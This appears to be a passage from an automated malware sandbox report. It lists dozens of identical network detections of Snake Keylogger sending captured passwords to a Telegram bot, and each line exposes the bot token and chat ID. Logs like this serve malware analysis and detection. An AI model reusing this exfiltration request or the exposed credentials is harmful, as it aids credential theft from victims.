                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f2c783aaHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f3031ddfHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f40e254eHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f444fb1eHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f480962dHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f4b76b89Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f4f30770Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f529dd26Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f5657896Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f59c4f71Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f5d7ec7dHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f615e5bbHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f653e20dHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f68f7cf8Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f6cd7a55Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f701edebHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f73feb89Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f77b866aHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f7b25b44Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f7edf6c4Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f82bf373Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f86067acHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f8acb278Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f8ea30bbHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f92f01a8Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f98a9311Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756f9e0108dHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756fa1d1fc1Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756fa587eadHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756fa972b02Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756fada5b0dHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756fb1757f1Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756fb546dbcHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756fb920eddHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756fbfb8a63Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756fc3abb98Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756fc767c16Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756fcc300e3Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756fd0035e8Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756fd35462bHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756fd90de94Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756fddd29b8Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756fe309bc3Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756fe6771e4Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756ff000861Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756ff3ba338Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756ff80c6ddHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5756ffb53c00Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757000186aaHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575700385bfdHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570073f6e2Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575700b1f3ffHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575700fe3f2eHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757013c3be7Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570177d6beHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575701aead2eHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575701e32082Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575702211da0Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757025cb83fHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575702938e2dHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575702d65175Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757030d2640Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570348c170Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570386be2eHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575703c4bbbeHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757040055f7Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575704372bc8Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570472c8bdHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575704a99d5fHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575704ec5f15Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575705233631Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757055edd67Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757059ccc9dHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575705d140a8Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757060f3d38Host: api.telegram.orgContent-Length: 504
